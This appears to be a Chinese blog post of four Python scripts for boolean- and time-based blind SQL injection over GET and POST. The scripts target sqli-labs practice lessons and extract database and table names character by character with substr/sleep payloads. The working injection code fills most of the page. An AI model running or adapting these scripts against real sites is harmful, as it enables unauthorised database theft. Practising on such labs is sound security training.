BOOL型GET传参sql盲注

点击查看代码 
import requests

chars =""

for i in range(32,127):

    chars += chr(i)

result = ""

url_template = "http://yourip/sqllabs/Less-8/?id=2' and ascii(substr(({0}),{1},1))>{2} %23"

url_length = "http://yourip/sqllabs/Less-8/?id=2' and length(({0})) >{1} %23"

def get_result_length(payload,value):

    for n in range(1,100):

        url = url_length.format(payload,n)

        response = requests.get(url)

        length = len(response.text)

        if length >value:

            print("·······data length is :" + str(n))

            return  n

def get_db_name(data_length,payload,value):

    for i in range(1,data_length):

        for char in chars:

            url = url_template.format(payload,i,ord(char))

            response = requests.get(url)

            length = len(response.text)

            if length>value:         #根据返回长度的不同来判断字符正确与否

                global result

                result += char

                print("·······data is :"+ result)

                break

#自定义 sql注入语句 payload   分割符 为0

payload = "select group_concat(table_name) from information_schema.tables where table_schema=database() "

# 根据正确访问时错误访问时返回页面文本长度的不同 来设置一个判断值

value = 706

data_length = get_result_length(payload,value)+1

get_db_name(data_length,payload,value)

print(result)

**延时型GET传参sql盲注**

点击查看代码 
import requests

value =""

for i in range(32,127):

    value += chr(i)

data=""

# 需要 不断 手工调整 url 和 url_length 中的 limit 的第一个参数 来获取下一行的数据

url = "http://yourip/sqllabs/Less-9/?id=1' and if((ascii(substr(({0} limit 1,1),{1},1)) = '{2}'),sleep(3),NULL); %23"

url_length="http://yourip/sqllabs/Less-9/?id=1' and if((length(({0} limit 1,1))={1} ),sleep(3),NULL); %23"

def get_length(payload):

    for n in range(1,100):

        url= url_length.format(payload,n)

        #print(url)

        if(get_respone(url)):

            print("[+] length is {0}".format(n))

            return n

def get_data(payload,value,length):

    for n in range(1,length):

        for v in value :

            url_data = url.format(payload,n,ord(v)) #ord()返回字符的ASCII码

            #print(url_data)

            if(get_respone(url_data)):

                global data

                data=data+v

                print("[+] data is {0}".format(data))

                break

def get_respone(url):

    try:

        html = requests.get(url,timeout=2)

        return False

    except Exception as e:

        print("......")

        return True

#可以更改payload 来获取需要的数据

databse_payload ="select database()"

get_data(databse_payload,value,get_length(databse_payload)+1)

**BOOL型POST传参sql盲注**

点击查看代码 
import requests

chars =""

for i in range(32,127):

    chars += chr(i)

result = ""

def get_length(value):  #获取要查询的数据的长度

    for n in range(1,100):

        payload = "admin' and length(({0})) ={1} #".format(data_payload,n)

        data = {"uname":payload,"passwd":"admin"}

        html = requests.post(url,data=data)

        length = len(html.text)

        if length >value:

            print("……data length is :" + str(n))

            return  n

def get_data(data_length,value): #获取数据

    global result

    for i in range(1,data_length):

        for char in chars:

            payload = "admin'and ascii(substr(({0}),{1},1))={2} #".format(data_payload,i,ord(char))

            data = {"uname":payload,"passwd":"admin"}

            html = requests.post(url,data=data)

            length = len(html.text)

            if length>value:         #根据返回长度的不同来判断字符正确与否

                result += char

                print("…… data is :"+ result)

                break

url = "http://yourip/sqllabs/Less-15/"

data_payload = "select group_concat(table_name)from information_schema.tables where table_schema = database()"

value = 1460     # 根据正确访问和错误访问时返回页面文本长度的不同 来设置一个判断值,这个值需要在浏览器中 按f12 查看

length = get_length(value) +1

get_data(length,value)

print(result)

**延时型POST传参sql盲注**

点击查看代码 


import requests

import time

value =""

for i in range(32,127):

    value += chr(i)

result=""

def get_length():#获取数据的长度

    for n in range(1, 100):

        payload = "admin' and if((length(({0} ))={1}),sleep(2),1) #".format(data_payload, n)

        data = {"uname": payload, "passwd": "admin", "submit": "submit"}

        start_time = time.time()

        html = requests.post(url, data=data)

        end_time = time.time()

        use_time = end_time - start_time #求出请求前后的时间差来判断是否延时了

        if use_time > 2:

            print("...... data's length is :"+ str(n))

            return n

def get_data(length):#获取数据

    global result

    for n in range(1,length):

        for v in value :

            payload = "admin' and if((ascii(substr(({0} ),{1},1)) = '{2}'),sleep(2),1) #".format(data_payload,n,ord(v))

            data = {"uname":payload,"passwd":"admin","submit":"submit"}

            start_time = time.time()

            requests.post(url,data=data)

            end_time = time.time()

            use_time = end_time - start_time

            if use_time >2:

                result += v

                print("......"+result)

url = "http://yourip/sqllabs/Less-11/"

data_payload ="select database()"

length = get_length() + 1   #注意这里要长度加 1 因为 range(1,10)的范围是 1<= x <10

get_data(length)

print(".....data is :"+ result)

几种SQL盲注的脚本的更多相关文章

  1. metinfo小于v6.2.0版本SQL盲注利用脚本

    #coding=utf-8 import requests import re import sys import time #获取config_safe.php中的 key def getKey(u ...

  2. DVWA-SQL Injection (Bind) SQL盲注

    盲注同于union select查询注入,盲注只能得到数据库回显的正确和错误,利用返回的正确和错误一个一个判断. LOW 审计源码 <?php if( isset( $_GET[ 'Submit ...

  3. SQL盲注攻击的简单介绍

    1 简介     1.1 普通SQL注入技术概述     目前没有对SQL注入技术的标准定义,微软中国技术中心从2个方面进行了描述[1]:     (1) 脚本注入式的攻击     (2) 恶意用户输 ...

  4. Web系统常见安全漏洞及解决方案-SQL盲注

    关于web安全测试,目前主要有以下几种攻击方法: 1.XSS 2.SQL注入 3.跨目录访问 4.缓冲区溢出 5.cookies修改 6.Htth方法篡改(包括隐藏字段修改和参数修改) 7.CSRF ...

  5. (转)SQL盲注攻击的简单介绍

    转:http://hi.baidu.com/duwang1104/item/65a6603056aee780c3cf2968 1 简介     1.1 普通SQL注入技术概述     目前没有对SQL ...

  6. Bugku-CTF之login3(SKCTF)(基于布尔的SQL盲注)

    Day41 login3(SKCTF)

  7. WEB安全实战(一)SQL盲注

    前言 好长时间没有写过东西了,不是不想写,仅仅只是是一直静不下心来写点东西.当然,拖了这么长的时间,也总该写点什么的.近期刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈近期接触到的安全 ...

  8. WEB安全番外第四篇--关于SQL盲注

    一.SQL盲注: 看不到回显的,无法从返回直接读取到数据库内容的对数据的猜解,属于盲注. 二.第一种--基于布尔类型的盲注: 这种很简单,最典型的例子,就是挖SQL注入的时候常用的: ''' http ...

  9. SQL盲注

    一.首先输入1和-1 查看输入正确和不正确两种情况 二.三种注入POC LOW等级 ... where user_id =$id 输入      真  and  假 = 假 (1)...where u ...

  10. 第九届极客大挑战——Geek Chatroom(sql盲注)

    首先观察这个web应用的功能,可以任意留言,也可以搜索留言,当然我还用cansina扫描过网站,查看过源码,抓包查看过header等.没发现其他提示的情况下断定这就是个sql注入,可能存在的注入点呢, ...

随机推荐

  1. c++中的构造函数,拷贝构造函数和赋值函数

    1.拷贝构造和赋值函数的区别: 1)拷贝构造函数是一个对象初始化一块内存区域,这块内存就是新对象的内存区,而赋值函数是对于一个已经被初始化的对象来进行赋值操作. 2)一般来说在数据成员包含指针对象的时 ...

  2. 《Unix/Linux系统编程》第十周学习笔记

    <Unix/Linux系统编程>第十周学习笔记 块设备I/O和缓冲区管理 解释块设备I/O的原理和I/O缓冲的优点 I/O缓冲区:内核中的一系列NBUF缓冲区用作缓冲区缓存.每个缓冲区用一 ...

  3. Rust for Rustaceans: Idomatic Programming for Experienced Developers Chap.2 Types

    翻译的内容如果有不理解的地方或者是其他的差错,欢迎后台回复讨论. 类型在内存中的表示 Rust中的每一个值都有自己的类型(Type).在这一章中,我们将会看到Rust中的类型服务于许多不同的目的,但其 ...

  4. leetcode medium 记录 51-100

      # Title Solution Acceptance Difficulty Frequency     92 Reverse Linked List II       40.3% Medium ...

  5. Navicat基础教程

    1.安装 可以直接前往官网进行安装,网址如下: https://navicat.com.cn/download/navicat-premium 下载之后将下载后的压缩包解压到当前文件夹,然后根据里面自 ...

  6. .NET应用系统的国际化-基于Roslyn抽取词条、更新代码

    上篇文章我们介绍了 VUE+.NET应用系统的国际化-多语言词条服务 系统国际化改造整体设计思路如下: 提供一个工具,识别前后端代码中的中文,形成多语言词条,按语言.界面.模块统一管理多有的多语言词条 ...

  7. Centos 6 部署PPTP服务

    前言:PPTP使用一个TCP连接对隧道进行维护,使用通用路由封装(GRE)技术把数据封装成PPP数据桢通过隧道传送.可以对封装PPP桢中的负载数据进行加密或压缩. 注意:PPTP协议已经被IOS系统所 ...

  8. Java面试——消息队列

    一.消息队列的使用场景 ☞ 以下介绍消息队列在实际应用常用的使用场景.异步处理.应用解耦.流量削锋和消息通讯四个场景.[1]异步处理:场景说明:用户注册后,需要发注册邮件和注册短信.  引入消息队列后 ...

  9. 利用复杂数据类型(eg:对象)时,是直接调用属性快,还是先用变量填装使用快

    为了验证,我用时间戳去尝试 <!DOCTYPE html> <html lang="zh-CN"> <head>     <meta ch ...

  10. 拒绝“爆雷”!GaussDB(for MySQL)新上线了这个功能

    摘要:智能把控大数据量查询,防患系统奔溃于未然. 本文分享自华为云社区<拒绝"爆雷"!GaussDB(for MySQL)新上线了这个功能>,作者:GaussDB 数据 ...